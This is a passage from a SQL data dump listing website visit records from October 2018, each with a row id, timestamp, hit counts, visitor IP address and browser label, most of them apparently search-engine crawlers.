,1,0,0,'66.249.64.59','chrome'),(316549,1539413812,1,1,0,0,'54.36.148.237','other'),(316550,1539414096,1,1,0,0,'54.36.149.67','other'),(316551,1539414131,1,1,0,0,'66.249.64.201','chrome'),(316552,1539414223,1,1,0,0,'78.46.63.108','other'),(316553,1539414229,1,1,0,0,'54.36.148.35','other'),(316554,1539414528,1,1,0,0,'54.36.148.122','other'),(316555,1539414597,1,1,0,0,'54.36.148.46','other'),(316556,1539414618,1,1,0,0,'54.36.149.29','other'),(316557,1539414914,1,1,0,0,'54.36.148.185','other'),(316558,1539414984,1,1,0,0,'54.36.148.166','other'),(316559,1539415155,1,1,0,0,'54.36.149.19','other'),(316560,1539415439,2,2,0,0,'66.249.64.195','chrome'),(316561,1539415644,1,1,0,0,'66.249.64.201','chrome'),(316562,1539415709,1,1,0,0,'8.29.198.27','other'),(316563,1539415778,1,1,0,0,'54.36.149.62','other'),(316564,1539416122,1,1,0,0,'54.36.149.22','other'),(316565,1539416149,1,1,0,0,'54.36.148.76','other'),(316566,1539416217,1,1,0,0,'54.36.148.72','other'),(316567,1539416343,1,1,0,0,'54.36.149.80','other'),(316568,1539416380,1,1,0,0,'46.229.168.129','other'),(316569,1539416468,1,1,0,0,'54.36.148.218','other'),(316570,1539416642,1,1,0,0,'54.36.149.79','other'),(316571,1539416690,1,1,0,0,'54.36.148.168','other'),(316572,1539416723,1,1,0,0,'89.238.186.73','firefox'),(316573,1539416763,1,1,0,0,'54.36.149.25','other'),(316574,1539416809,1,1,0,0,'207.46.13.195','other'),(316575,1539416853,1,1,0,0,'54.36.149.45','other'),(316576,1539416986,1,1,0,0,'54.36.148.30','other'),(316577,1539417049,1,1,0,0,'54.36.148.45','other'),(316578,1539417252,1,1,0,0,'54.36.149.37','other'),(316579,1539417340,1,1,0,0,'216.244.66.241','other'),(316580,1539417524,1,1,0,0,'54.36.149.26','other'),(316581,1539417541,1,1,0,0,'54.36.148.64','other'),(316582,1539417621,1,1,0,0,'54.36.148.245','other'),(316583,1539417727,1,1,0,0,'54.36.149.69','other'),(316584,1539417774,2,2,0,0,'66.249.64.201','chrome'),(316585,1539417857,1,1,0,0,'54.36.148.137','other'),(316586,1539417997,1,1,0,0,'54.36.148.200','other'),(316587,1539418081,1,1,0,0,'54.36.148.183','other'),(316588,1539418211,1,1,0,0,'54.36.148.244','other'),(316589,1539418481,1,1,0,0,'54.36.149.85','other'),(316590,1539418636,1,1,0,0,'54.36.148.151','other'),(316591,1539418849,1,1,0,0,'54.36.148.188','other'),(316592,1539419151,1,1,0,0,'66.249.64.61','chrome'),(316593,1539419199,1,1,0,0,'54.36.149.71','other'),(316594,1539419426,1,1,0,0,'54.36.148.247','other'),(316595,1539419466,1,1,0,0,'54.36.149.14','other'),(316596,1539419540,1,1,0,0,'54.36.148.226','other'),(316597,1539419983,4,4,0,0,'216.244.66.241','other'),(316598,1539420449,1,1,0,0,'54.36.148.143','other'),(316599,1539420457,1,1,0,0,'54.36.148.169','other'),(316600,1539420572,1,1,0,0,'54.36.149.24','other'),(316601,1539420613,1,1,0,0,'54.36.148.188','other'),(316602,1539420707,1,1,0,0,'66.249.64.199','chrome'),(316603,1539420912,1,1,0,0,'66.249.64.195','chrome'),(316604,1539421132,1,1,0,0,'157.55.39.152','other'),(316605,1539421139,1,1,0,0,'46.229.168.140','other'),(316606,1539421618,1,1,0,0,'54.36.149.28','other'),(316607,1539421894,1,1,0,0,'54.36.148.131','other'),(316608,1539422110,1,1,0,0,'54.36.149.34','other'),(316609,1539422498,1,1,0,0,'8.29.198.26','other'),(316610,1539422525,1,1,0,0,'54.36.149.100','other'),(316611,1539422538,1,1,0,0,'66.249.64.57','chrome'),(316612,1539422628,1,1,0,0,'54.36.148.169','other'),(316613,1539422685,1,1,0,0,'54.36.148.51','other'),(316614,1539422791,1,1,0,0,'8.29.198.25','other'),(316615,1539422938,2,2,0,0,'216.244.66.241','other'),(316616,1539423176,1,1,0,0,'54.36.148.113','other'),(316617,1539423216,1,1,0,0,'54.36.149.37','other'),(316618,1539423332,1,1,0,0,'54.36.149.19','other'),(316619,1539423337,1,1,0,0,'54.36.148.163','other'),(316620,1539423555,1,1,0,0,'46.229.168.141','other'),(316621,1539423561,1,1,0,0,'37.55.59.245','chrome'),(316622,1539423843,1,1,0,0,'54.36.149.7','other'),(316623,1539423889,1,1,0,0,'54.36.148.67','other'),(316624,1539423977,1,1,0,0,'54.36.149.34','other'),(316625,1539424162,1,1,0,0,'66.249.64.195','chrome'),(316626,1539424163,1,1,0,0,'54.36.148.71','other'),(316627,1539424522,1,1,0,0,'95.163.255.92','other'),(316628,1539424568,1,1,0,0,'162.210.196.130','other'),(316629,1539424920,1,1,0,0,'193.106.30.98','firefox'),(316630,1539425000,1,1,0,0,'66.249.64.199','chrome'),(316631,1539425107,1,1,0,0,'178.255.215.94','other'),(316632,1539425427,1,1,0,0,'54.36.148.119','other'),(316633,1539425625,1,1,0,0,'54.36.149.3','other'),(316634,1539425815,1,1,0,0,'54.36.149.9','other'),(316635,1539426215,1,1,0,0,'54.36.149.92','other'),(316636,1539426282,1,1,0,0,'54.36.149.30','other'),(316637,1539426434,1,1,0,0,'178.154.244.29','other'),(316638,1539426543,1,1,0,0,'8.29.198.27','other'),(316639,1539426809,1,1,0,0,'80.252.153.33','firefox'),(316640,1539427025,1,1,0,0,'54.36.148.92','other'),(316641,1539427226,1,1,0,0,'54.36.149.62','other'),(316642,1539427465,1,1,0,0,'54.36.148.126','other'),(316643,1539427486,1,1,0,0,'54.36.148.185','other'),(316644,1539427523,1,1,0,0,'54.36.148.87','other'),(316645,1539427559,1,1,0,0,'54.36.148.244','other'),(316646,1539427745,1,1,0,0,'54.36.148.141','other'),(316647,1539427778,1,1,0,0,'54.36.148.47','other'),(316648,1539427948,1,1,0,0,'66.249.64.57','chrome'),(316649,1539427979,1,1,0,0,'54.36.148.238','other'),(316650,1539428488,1,1,0,0,'216.244.66.241','other'),(316651,1539428737,1,1,0,0,'54.36.148.169','other'),(316652,1539428823,1,1,0,0,'54.36.148.87','other'),(316653,1539428903,1,1,0,0,'54.36.148.159','other'),(316654,1539428915,1,1,0,0,'54.36.149.4','other'),(316655,1539429589,1,1,0,0,'54.36.148.251','other'),(316656,1539429747,1,1,0,0,'54.36.149.39','other'),(316657,1539429829,1,1,0,0,'54.36.149.24','other'),(316658,1539429835,1,1,0,0,'54.36.148.22','other'),(316659,1539429879,1,1,0,0,'54.36.148.84','other'),(316660,1539430062,1,1,0,0,'54.36.149.5','other'),(316661,1539430096,1,1,0,0,'46.229.168.136','other'),(316662,1539430144,1,1,0,0,'54.36.148.100','other'),(316663,1539430252,1,1,0,0,'54.36.148.225','other'),(316664,1539430585,1,1,0,0,'54.36.148.76','other'),(316665,1539430666,1,1,0,0,'66.249.64.201','chrome'),(316666,1539430766,1,1,0,0,'54.36.148.124','other'),(316667,1539430777,4,4,0,0,'216.244.66.241','other'),(316668,1539430799,1,1,0,0,'54.36.148.174','other'),(316669,1539430851,1,1,0,0,'66.249.64.195','chrome'),(316670,1539430934,1,1,0,0,'54.36.149.84','other'),(316671,1539431280,1,1,0,0,'54.36.149.102','other'),(316672,1539431692,1,1,0,0,'54.36.148.221','other'),(316673,1539431881,2,2,0,0,'54.36.149.17','other'),(316674,1539431923,1,1,0,0,'54.36.148.15','other'),(316675,1539432916,1,1,0,0,'54.36.148.241','other'),(316676,1539433122,1,1,0,0,'54.36.148.245','other'),(316677,1539433356,1,1,0,0,'8.29.198.26','other'),(316678,1539433436,2,2,0,0,'216.244.66.241','other'),(316679,1539433644,1,1,0,0,'8.29.198.27','other'),(316680,1539433866,1,1,0,0,'54.36.148.11','other'),(316681,1539433924,1,1,0,0,'54.36.149.47','other'),(316682,1539433945,1,1,0,0,'54.36.148.97','other'),(316683,1539434020,1,1,0,0,'54.36.148.251','other'),(316684,1539434123,1,1,0,0,'54.36.148.181','other'),(316685,1539434271,1,1,0,0,'54.36.148.141','other'),(316686,1539434321,1,1,0,0,'54.36.148.85','other'),(316687,1539434400,1,1,0,0,'66.249.64.195','chrome'),(316688,1539434402,1,1,0,0,'54.36.148.240','other'),(316689,1539434405,1,1,0,0,'54.36.148.32','other'),(316690,1539434412,1,1,0,0,'54.36.148.106','other'),(316691,1539434926,1,1,0,0,'54.36.149.82','other'),(316692,1539434970,1,1,0,0,'54.36.149.9','other'),(316693,1539435431,1,1,0,0,'54.36.148.169','other'),(316694,1539435494,1,1,0,0,'185.163.111.235','chrome'),(316695,1539435512,1,1,0,0,'54.36.148.244','other'),(316696,1539435586,1,1,0,0,'54.36.149.94','other'),(316697,1539435605,9,9,0,0,'216.244.66.241','other'),(316698,1539435634,1,1,0,0,'54.36.148.38','other'),(316699,1539435689,1,1,0,0,'54.36.148.68','other'),(316700,1539435820,1,1,0,0,'54.36.148.18','other'),(316701,1539435869,1,0,1,0,'66.249.64.195',''),(316702,1539436126,1,1,0,0,'54.36.148.113','other'),(316703,1539436128,1,1,0,0,'54.36.149.57','other'),(316704,1539436374,1,1,0,0,'66.249.64.195','chrome'),(316705,1539436448,1,1,0,0,'54.36.148.188','other'),(316706,1539436636,1,1,0,0,'54.36.148.211','other'),(316707,1539436787,1,1,0,0,'54.36.149.68','other'),(316708,1539436863,1,1,0,0,'54.36.149.31','other'),(316709,1539437164,1,1,0,0,'54.36.149.33','other'),(316710,1539437269,1,1,0,0,'54.36.148.171','other'),(316711,1539437377,1,1,0,0,'8.29.198.27','other'),(316712,1539437473,2,2,0,0,'66.249.64.201','chrome'),(316713,1539437724,1,1,0,0,'54.36.149.22','other'),(316714,1539437937,1,1,0,0,'54.36.149.87','other'),(316715,1539438053,2,2,0,0,'216.244.66.241','other'),(316716,1539438166,1,1,0,0,'54.36.148.71','other'),(316717,1539438388,1,1,0,0,'54.36.149.4','other'),(316718,1539438397,1,1,0,0,'54.36.148.121','other'),(316719,1539438521,1,1,0,0,'54.36.148.253','other'),(316720,1539438586,1,1,0,0,'54.36.148.56','other'),(316721,1539438640,1,1,0,0,'54.36.148.125','other'),(316722,1539438794,1,1,0,0,'54.36.149.13','other'),(316723,1539438857,1,1,0,0,'54.36.149.100','other'),(316724,1539438982,1,1,0,0,'54.36.148.185','other'),(316725,1539439215,1,1,0,0,'54.36.149.12','other'),(316726,1539439380,1,1,0,0,'54.36.148.221','other'),(316727,1539439399,1,1,0,0,'54.36.148.87','other'),(316728,1539439503,1,1,0,0,'54.36.148.152','other'),(316729,1539439979,1,1,0,0,'95.163.255.99','other'),(316730,1539440402,1,1,0,0,'46.229.168.142','other'),(316731,1539440503,1,1,0,0,'66.249.64.201','chrome'),(316732,1539440518,1,1,0,0,'54.36.148.66','other'),(316733,1539440947,1,1,0,0,'54.36.149.36','other'),(316734,1539441057,1,1,0,0,'54.36.148.47','other'),(316735,1539441106,1,1,0,0,'54.36.148.76','other'),(316736,1539441168,1,1,0,0,'54.36.149.39','other'),(316737,1539441221,4,4,0,0,'216.244.66.241','other'),(316738,1539441283,1,1,0,0,'54.36.149.86','other'),(316739,1539441418,1,1,0,0,'54.36.148.10','other'),(316740,1539441543,1,1,0,0,'54.36.148.128','other'),(316741,1539441562,1,1,0,0,'54.36.148.60','other'),(316742,1539441763,1,1,0,0,'54.36.149.41','other'),(316743,1539442166,1,1,0,0,'54.36.148.16','other'),(316744,1539442221,1,1,0,0,'54.36.149.101','other'),(316745,1539442246,1,1,0,0,'54.36.149.68','other'),(316746,1539442460,1,1,0,0,'54.36.148.72','other'),(316747,1539442510,1,1,0,0,'54.36.148.56','other'),(316748,1539442676,1,1,0,0,'54.36.148.104','other'),(316749,1539443110,1,1,0,0,'54.36.148.185','other'),(316750,1539443275,1,1,0,0,'54.36.148.242','other'),(316751,1539443336,1,1,0,0,'5.45.207.79','other'),(316752,1539443480,1,1,0,0,'54.36.149.79','other'),(316753,1539443654,1,1,0,0,'51.255.65.46','other'),(316754,1539443713,1,1,0,0,'54.36.148.55','other'),(316755,1539443879,1,1,0,0,'54.36.148.96','other'),(316756,1539443921,1,1,0,0,'54.36.148.21','other'),(316757,1539444210,1,1,0,0,'8.29.198.26','other'),(316758,1539444359,1,1,0,0,'54.36.148.123','other'),(316759,1539444498,1,1,0,0,'8.29.198.27','other'),(316760,1539444898,1,1,0,0,'54.36.148.131','other'),(316761,1539445301,1,1,0,0,'54.36.149.33','other'),(316762,1539445318,1,1,0,0,'54.36.149.81','other'),(316763,1539445534,1,1,0,0,'54.36.148.14','other'),(316764,1539445554,1,1,0,0,'54.36.149.23','other'),(316765,1539445617,1,1,0,0,'91.209.11.236','other'),(316766,1539445628,4,4,0,0,'216.244.66.241','other'),(316767,1539446026,1,1,0,0,'54.36.149.30','other'),(316768,1539446144,1,1,0,0,'207.46.13.177','other'),(316769,1539446216,1,1,0,0,'54.36.148.120','other'),(316770,1539446302,1,1,0,0,'54.36.149.97','other'),(316771,1539446392,1,1,0,0,'54.36.149.63','other'),(316772,1539446447,1,1,0,0,'54.36.149.0','other'),(316773,1539446575,1,1,0,0,'95.163.255.93','other'),(316774,1539446880,1,1,0,0,'54.36.148.198','other'),(316775,1539446960,1,1,0,0,'95.163.255.98','other'),(316776,1539447019,1,1,0,0,'54.36.148.254','other'),(316777,1539447080,1,1,0,0,'54.36.148.137','other'),(316778,1539447088,1,1,0,0,'54.36.149.51','other'),(316779,1539447130,2,2,0,0,'54.36.148.102','other'),(316780,1539447660,1,1,0,0,'54.36.149.88','other'),(316781,1539447672,1,1,0,0,'54.36.148.59','other'),(316782,1539447850,1,1,0,0,'54.36.148.88','other'),(316783,1539447939,1,1,0,0,'54.36.148.124','other'),(316784,1539448080,1,1,0,0,'37.54.23.36','chrome'),(316785,1539448092,1,1,0,0,'54.36.148.17','other'),(316786,1539448208,4,4,0,0,'216.244.66.241','other'),(316787,1539448222,1,1,0,0,'8.29.198.27','other'),(316788,1539448362,1,1,0,0,'46.229.168.138','other'),(316789,1539449085,1,1,0,0,'54.36.148.193','other'),(316790,1539449357,1,1,0,0,'5.45.207.79','other'),(316791,1539449409,1,1,0,0,'54.36.148.215','other'),(316792,1539449527,1,1,0,0,'54.36.148.141','other'),(316793,1539449552,1,1,0,0,'54.36.148.224','other'),(316794,1539449629,1,1,0,0,'54.36.149.92','other'),(316795,1539449696,1,1,0,0,'178.154.244.29','other'),(316796,1539449741,1,1,0,0,'54.36.149.80','other'),(316797,1539449746,1,1,0,0,'54.36.149.45','other'),(316798,1539449815,1,1,0,0,'54.36.148.119','other'),(316799,1539449875,1,1,0,0,'54.36.149.66','other'),(316800,1539450079,1,1,0,0,'54.36.148.69','other'),(316801,1539450219,1,1,0,0,'54.36.149.68','other'),(316802,1539450819,1,1,0,0,'54.36.148.192','other'),(316803,1539450923,1,1,0,0,'5.45.207.79','other'),(316804,1539451132,1,1,0,0,'54.36.148.72','other'),(316805,1539451322,1,1,0,0,'178.154.244.29','other'),(316806,1539451367,1,1,0,0,'66.249.64.57','chrome'),(316807,1539451479,1,1,0,0,'178.154.244.11','other'),(316808,1539451513,1,1,0,0,'216.244.66.241','other'),(316809,1539451682,1,1,0,0,'54.36.148.73','other'),(316810,1539451788,1,1,0,0,'66.249.64.195','chrome'),(316811,1539451853,1,1,0,0,'54.36.148.53','other'),(316812,1539451947,1,1,0,0,'54.36.148.128','other'),(316813,1539452121,1,1,0,0,'54.36.148.185','other'),(316814,1539452167,1,1,0,0,'54.36.148.189','other'),(316815,1539452314,1,1,0,0,'54.36.148.238','other'),(316816,1539452501,1,1,0,0,'54.36.148.98','other'),(316817,1539452565,1,1,0,0,'54.36.149.24','other'),(316818,1539452607,1,1,0,0,'54.36.149.60','other'),(316819,1539452624,1,1,0,0,'46.229.168.132','other'),(316820,1539453016,1,1,0,0,'3.120.149.50','other'),(316821,1539453070,1,1,0,0,'216.244.66.241','other'),(316822,1539453269,1,1,0,0,'54.36.148.254','other'),(316823,1539453475,1,1,0,0,'54.36.149.92','other'),(316824,1539453933,1,1,0,0,'54.36.148.185','other'),(316825,1539453983,1,1,0,0,'95.163.255.98','other'),(316826,1539454001,1,1,0,0,'54.36.148.191','other'),(316827,1539454399,1,1,0,0,'91.196.178.174','chrome'),(316828,1539455075,1,1,0,0,'8.29.198.27','other'),(316829,1539455091,1,1,0,0,'54.36.149.75','other'),(316830,1539455306,1,1,0,0,'54.36.148.127','other'),(316831,1539455347,1,1,0,0,'8.29.198.26','other'),(316832,1539455357,1,1,0,0,'54.36.149.57','other'),(316833,1539455911,1,1,0,0,'54.36.148.90','other'),(316834,1539456126,1,1,0,0,'54.36.149.103','other'),(316835,1539456282,1,1,0,0,'54.36.148.239','other'),(316836,1539456389,1,1,0,0,'54.36.149.94','other'),(316837,1539456631,1,1,0,0,'216.244.66.241','other'),(316838,1539456660,1,1,0,0,'54.36.149.82','other'),(316839,1539456681,1,1,0,0,'54.36.148.241','other'),(316840,1539456776,1,1,0,0,'54.36.149.98','other'),(316841,1539456925,1,1,0,0,'54.36.148.23','other'),(316842,1539457199,1,1,0,0,'54.36.148.132','other'),(316843,1539457201,1,1,0,0,'54.36.149.48','other'),(316844,1539457247,1,1,0,0,'95.163.255.96','other'),(316845,1539457359,1,1,0,0,'54.36.148.229','other'),(316846,1539457987,1,1,0,0,'54.36.148.93','other'),(316847,1539458142,1,1,0,0,'54.36.149.89','other'),(316848,1539458584,1,1,0,0,'54.36.149.58','other'),(316849,1539458595,1,1,0,0,'46.229.168.140','other'),(316850,1539458733,1,1,0,0,'52.53.201.78','chrome'),(316851,1539459062,1,1,0,0,'8.29.198.25','other'),(316852,1539459226,1,1,0,0,'216.244.66.241','other'),(316853,1539459235,1,1,0,0,'54.36.148.244','other'),(316854,1539459236,1,1,0,0,'54.36.148.88','other'),(316855,1539459628,1,1,0,0,'54.36.148.97','other'),(316856,1539459782,1,1,0,0,'79.142.204.62','chrome'),(316857,1539459853,1,1,0,0,'91.209.11.236','other'),(316858,1539460480,1,1,0,0,'54.36.148.160','other'),(316859,1539460546,1,1,0,0,'54.36.149.32','other'),(316860,1539460580,1,1,0,0,'54.36.148.244','other'),(316861,1539460716,1,1,0,0,'54.36.148.50','other'),(316862,1539460909,1,1,0,0,'54.36.148.12','other'),(316863,1539460975,1,1,0,0,'54.36.148.176','other'),(316864,1539460977,1,1,0,0,'54.36.148.168','other'),(316865,1539461021,1,1,0,0,'46.229.168.137','other'),(316866,1539461349,1,1,0,0,'40.77.167.148','other'),(316867,1539461830,1,1,0,0,'54.36.148.99','other'),(316868,1539461986,1,1,0,0,'54.36.148.203','other'),(316869,1539462043,1,1,0,0,'54.36.149.84','other'),(316870,1539462271,1,1,0,0,'40.77.167.148','other'),(316871,1539462424,1,1,0,0,'157.55.39.57','other'),(316872,1539462446,1,1,0,0,'207.46.13.185','other'),(316873,1539462589,1,1,0,0,'54.36.148.121','other'),(316874,1539462698,1,1,0,0,'207.46.13.235','other'),(316875,1539462702,2,2,0,0,'207.46.13.232','other'),(316876,1539462707,1,1,0,0,'40.77.167.220','other'),(316877,1539463130,1,1,0,0,'54.36.148.241','other'),(316878,1539463132,1,1,0,0,'54.36.148.11','other'),(316879,1539463359,1,1,0,0,'54.36.148.63','other'),(316880,1539463439,1,1,0,0,'54.36.149.83','other'),(316881,1539463489,1,1,0,0,'207.46.13.185','other'),(316882,1539463682,1,1,0,0,'54.36.148.29','other'),(316883,1539463762,1,1,0,0,'54.36.149.107','other'),(316884,1539463969,1,0,1,0,'66.249.64.195',''),(316885,1539463971,1,1,0,0,'54.36.149.3','other'),(316886,1539464076,2,2,0,0,'54.36.148.126','other'),(316887,1539464205,1,1,0,0,'54.36.149.14','other'),(316888,1539464216,3,3,0,0,'216.244.66.241','other'),(316889,1539464585,1,1,0,0,'54.36.148.150','other'),(316890,1539464628,1,1,0,0,'54.36.148.163','other'),(316891,1539464811,1,1,0,0,'54.36.148.139','other'),(316892,1539464942,1,1,0,0,'54.36.148.18','other'),(316893,1539464982,1,1,0,0,'54.36.148.40','other'),(316894,1539465147,1,1,0,0,'31.13.115.5','other'),(316895,1539465151,1,1,0,0,'31.13.115.11','other'),(316896,1539465596,1,1,0,0,'54.36.148.210','other'),(316897,1539465613,1,1,0,0,'54.36.148.115','other'),(316898,1539465928,1,1,0,0,'8.29.198.27','other'),(316899,1539465944,1,1,0,0,'54.36.148.124','other'),(316900,1539466058,1,1,0,0,'46.229.168.148','other'),(316901,1539466192,1,1,0,0,'8.29.198.25','other'),(316902,1539466577,1,1,0,0,'54.36.148.97','other'),(316903,1539466878,1,1,0,0,'54.36.148.69','other'),(316904,1539466900,1,1,0,0,'54.36.148.221','other'),(316905,1539466901,1,1,0,0,'46.229.168.137','other'),(316906,1539467165,2,2,0,0,'157.55.39.57','other'),(316907,1539467284,1,1,0,0,'54.36.149.17','other'),(316908,1539467366,1,1,0,0,'54.36.148.130','other'),(316909,1539467607,1,1,0,0,'54.36.148.238','other'),(316910,1539467937,1,1,0,0,'54.36.148.177','other'),(316911,1539468032,1,1,0,0,'54.36.149.74','other'),(316912,1539468329,1,1,0,0,'54.36.148.53','other'),(316913,1539468893,1,1,0,0,'54.36.148.27','other'),(316914,1539469228,1,1,0,0,'95.163.255.96','other'),(316915,1539469316,1,1,0,0,'216.244.66.241','other'),(316916,1539469747,1,1,0,0,'54.36.148.233','other'),(316917,1539469892,1,1,0,0,'8.29.198.26','other'),(316918,1539469901,1,1,0,0,'54.36.149.52','other'),(316919,1539470012,1,1,0,0,'54.36.148.110','other'),(316920,1539470292,1,1,0,0,'54.36.148.53','other'),(316921,1539470566,1,1,0,0,'54.36.148.84','other'),(316922,1539470626,1,1,0,0,'54.36.148.153','other'),(316923,1539471143,1,1,0,0,'40.77.167.148','other'),(316924,1539471145,1,1,0,0,'54.36.148.19','other'),(316925,1539471222,1,1,0,0,'54.36.148.123','other'),(316926,1539471253,1,1,0,0,'54.36.149.48','other'),(316927,1539471324,1,1,0,0,'54.36.148.165','other'),(316928,1539471353,1,1,0,0,'87.118.92.43','other'),(316929,1539471445,2,2,0,0,'54.36.148.221','other'),(316930,1539471615,1,1,0,0,'54.36.149.105','other'),(316931,1539471700,1,1,0,0,'54.36.148.183','other'),(316932,1539471816,1,1,0,0,'54.36.148.113','other'),(316933,1539471948,1,1,0,0,'54.36.149.28','other'),(316934,1539472241,1,1,0,0,'54.36.148.229','other'),(316935,1539472268,1,1,0,0,'216.244.66.241','other'),(316936,1539472305,1,1,0,0,'54.36.148.190','other'),(316937,1539472338,1,1,0,0,'54.36.148.19','other'),(316938,1539473178,1,1,0,0,'66.249.64.195','chrome'),(316939,1539473400,1,1,0,0,'54.36.148.177','other'),(316940,1539473420,1,1,0,0,'54.36.148.142','other'),(316941,1539473421,1,1,0,0,'54.36.148.50','other'),(316942,1539473533,1,1,0,0,'54.36.149.58','other'),(316943,1539473543,1,1,0,0,'5.188.210.11','chrome'),(316944,1539473558,1,1,0,0,'54.36.148.217','other'),(316945,1539473737,1,1,0,0,'40.77.167.148','other'),(316946,1539473841,1,1,0,0,'54.36.149.42','other'),(316947,1539473858,1,1,0,0,'95.163.255.97','other'),(316948,1539474010,1,1,0,0,'54.36.149.51','other'),(316949,1539474869,1,1,0,0,'54.36.148.42','other'),(316950,1539474904,1,1,0,0,'216.244.66.241','other'),(316951,1539475147,1,1,0,0,'54.36.149.37','other'),(316952,1539475379,1,1,0,0,'54.36.148.221','other'),(316953,1539475443,1,1,0,0,'66.249.64.199','chrome'),(316954,1539475998,1,1,0,0,'54.36.148.23','other'),(316955,1539476030,1,1,0,0,'54.36.148.216','other'),(316956,1539476060,1,1,0,0,'54.36.148.191','other'),(316957,1539476168,1,1,0,0,'54.36.149.38','other'),(316958,1539476299,1,1,0,0,'157.55.39.57','other'),(316959,1539476783,1,1,0,0,'8.29.198.26','other'),(316960,1539476941,1,1,0,0,'54.36.148.55','other'),(316961,1539476967,1,1,0,0,'54.36.148.172','other'),(316962,1539476972,1,1,0,0,'193.106.30.98','firefox'),(316963,1539477038,1,1,0,0,'8.29.198.25','other'),(316964,1539477085,1,1,0,0,'54.36.148.46','other'),(316965,1539477229,1,1,0,0,'216.244.66.241','other'),(316966,1539477282,1,1,0,0,'54.36.148.142','other'),(316967,1539477593,1,1,0,0,'66.249.64.57','chrome'),(316968,1539477729,1,1,0,0,'54.36.148.255','other'),(316969,1539477854,1,1,0,0,'54.36.149.78','other'),(316970,1539478396,1,1,0,0,'54.36.148.204','other'),(316971,1539478861,1,1,0,0,'54.36.148.51','other'),(316972,1539478894,1,1,0,0,'54.36.148.73','other'),(316973,1539478962,1,1,0,0,'54.36.148.48','other'),(316974,1539478979,1,1,0,0,'54.36.148.77','other'),(316975,1539479138,1,1,0,0,'54.36.148.160','other'),(316976,1539479245,1,1,0,0,'54.36.148.41','other'),(316977,1539479322,1,1,0,0,'54.36.149.17','other'),(316978,1539479391,1,1,0,0,'54.36.148.211','other'),(316979,1539479496,1,1,0,0,'54.36.148.45','other'),(316980,1539479575,1,1,0,0,'54.36.148.63','other'),(316981,1539479663,1,1,0,0,'54.36.148.215','other'),(316982,1539479728,1,1,0,0,'54.36.148.167','other'),(316983,1539479804,1,1,0,0,'54.36.148.214','other'),(316984,1539479825,1,1,0,0,'54.36.148.186','other'),(316985,1539479856,1,1,0,0,'40.77.167.148','other'),(316986,1539479889,1,1,0,0,'54.36.149.88','other'),(316987,1539479945,4,4,0,0,'216.244.66.241','other'),(316988,1539480159,1,1,0,0,'54.36.148.213','other'),(316989,1539480261,1,1,0,0,'54.36.149.44','other'),(316990,1539480311,1,1,0,0,'54.36.148.55','other'),(316991,1539480342,1,1,0,0,'54.36.149.65','other'),(316992,1539480545,1,1,0,0,'54.36.148.12','other'),(316993,1539480562,1,1,0,0,'54.36.148.130','other'),(316994,1539480640,1,1,0,0,'157.55.39.115','other'),(316995,1539480692,1,1,0,0,'46.229.168.134','other'),(316996,1539480723,1,1,0,0,'8.29.198.27','other'),(316997,1539480920,1,1,0,0,'54.36.149.15','other'),(316998,1539480969,2,2,0,0,'178.154.244.11','other'),(316999,1539480970,1,1,0,0,'54.36.149.69','other'),(317000,1539481204,1,1,0,0,'54.36.148.31','other'),(317001,1539481444,1,1,0,0,'54.36.149.46','other'),(317002,1539481628,1,1,0,0,'66.249.64.195','chrome'),(317003,1539481906,2,2,0,0,'178.154.244.29','other'),(317004,1539482138,1,1,0,0,'54.36.148.173','other'),(317005,1539482231,1,1,0,0,'54.36.148.105','other'),(317006,1539482253,1,1,0,0,'54.36.148.246','other'),(317007,1539482487,1,1,0,0,'54.36.148.177','other'),(317008,1539482498,1,1,0,0,'207.46.13.185','other'),(317009,1539482723,1,1,0,0,'66.249.64.195','chrome'),(317010,1539483287,1,1,0,0,'178.154.200.48','other'),(317011,1539483290,1,1,0,0,'141.8.132.16','other'),(317012,1539483425,1,1,0,0,'54.36.148.245','other'),(317013,1539483646,1,1,0,0,'51.255.65.46','other'),(317014,1539483750,1,1,0,0,'54.36.149.4','other'),(317015,1539483775,1,1,0,0,'54.36.148.151','other'),(317016,1539483929,2,2,0,0,'178.154.244.29','other'),(317017,1539483937,1,1,0,0,'54.36.148.212','other'),(317018,1539484098,1,1,0,0,'54.36.149.101','other'),(317019,1539484288,1,1,0,0,'54.36.148.26','other'),(317020,1539484370,1,1,0,0,'95.163.255.94','other'),(317021,1539484375,1,1,0,0,'54.36.149.17','other'),(317022,1539484491,1,1,0,0,'178.154.244.11','other'),(317023,1539484496,1,1,0,0,'54.36.148.154','other'),(317024,1539484788,1,1,0,0,'54.36.149.25','other'),(317025,1539484836,1,1,0,0,'54.36.149.8','other'),(317026,1539485045,2,2,0,0,'216.244.66.241','other'),(317027,1539485358,1,1,0,0,'66.249.64.195','chrome'),(317028,1539485392,1,1,0,0,'54.36.148.97','other'),(317029,1539485625,1,1,0,0,'54.36.148.27','other'),(317030,1539485635,1,1,0,0,'54.36.148.131','other'),(317031,1539485771,1,1,0,0,'54.36.149.50','other'),(317032,1539485883,1,1,0,0,'54.36.148.90','other'),(317033,1539486099,1,1,0,0,'46.229.168.132','other'),(317034,1539486174,1,1,0,0,'54.36.149.102','other'),(317035,1539486430,1,1,0,0,'54.36.148.122','other'),(317036,1539486531,1,1,0,0,'54.36.148.236','other'),(317037,1539486533,1,1,0,0,'54.36.148.215','other'),(317038,1539486608,1,1,0,0,'54.36.148.168','other'),(317039,1539486721,1,1,0,0,'54.36.148.142','other'),(317040,1539486974,1,1,0,0,'54.36.149.5','other'),(317041,1539487353,1,1,0,0,'54.36.149.94','other'),(317042,1539487403,10,10,0,0,'157.55.39.57','other'),(317043,1539487413,7,7,0,0,'157.55.39.115','other'),(317044,1539487427,9,9,0,0,'207.46.13.185','other'),(317045,1539487443,8,8,0,0,'40.77.167.148','other'),(317046,1539487565,1,1,0,0,'54.36.148.178','other'),(317047,1539487635,2,2,0,0,'8.29.198.27','other'),(317048,1539487717,1,1,0,0,'216.244.66.241','other'),(317049,1539487783,1,1,0,0,'54.36.148.98','other'),(317050,1539487804,1,1,0,0,'54.36.149.54','other'),(317051,1539487942,1,1,0,0,'54.36.148.140','other'),(317052,1539488367,1,1,0,0,'54.36.148.155','other'),(317053,1539488578,1,1,0,0,'54.36.148.110','other'),(317054,1539488784,1,1,0,0,'35.202.99.105','other'),(317055,1539488790,1,1,0,0,'54.36.148.32','other'),(317056,1539488957,1,1,0,0,'54.36.148.207','other'),(317057,1539489246,1,1,0,0,'66.249.64.57','chrome'),(317058,1539489264,1,1,0,0,'54.36.148.139','other'),(317059,1539489357,1,1,0,0,'54.36.148.238','other'),(317060,1539489381,1,1,0,0,'157.55.39.115','other'),(317061,1539489549,1,1,0,0,'54.36.148.48','other'),(317062,1539489611,1,1,0,0,'54.36.149.53','other'),(